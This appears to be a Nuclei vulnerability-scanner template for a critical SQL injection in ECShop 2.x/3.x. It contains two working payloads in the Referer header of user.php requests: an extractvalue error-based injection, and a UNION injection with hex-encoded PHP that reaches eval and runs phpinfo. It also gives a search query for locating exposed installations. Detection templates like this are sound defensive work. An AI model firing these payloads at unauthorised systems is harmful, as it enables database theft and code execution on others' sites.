nuclei-templates/vulnerabilities/other/ecshop-sqli.yaml


id: ecshop-sqli

info:
  name: ECShop 2.x/3.x - SQL Injection
  author: Lark-lab,ImNightmaree,ritikchaddha
  severity: critical
  description: |
    ECShop 2.x and 3.x contain a SQL injection vulnerability which can allow an attacker to inject arbitrary SQL statements via the referer header field and the dangerous eval function, thus possibly allowing an attacker to obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
    - http://www.wins21.com/mobile/blog/blog_view.html?num=1172
    - https://www.shutingrz.com/post/ad_hack-ec_exploit/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-89
  metadata:
    verified: true
    fofa-query: app="ECShop"
  tags: sqli,php,ecshop

requests:
  - raw:
      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        words:
          - 'XPATH syntax error:'
          - '[error] =>'
          - '[0] => Array'
          - 'MySQL server error report:Array'
        condition: and

      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

# Enhanced by mp on 2022/09/28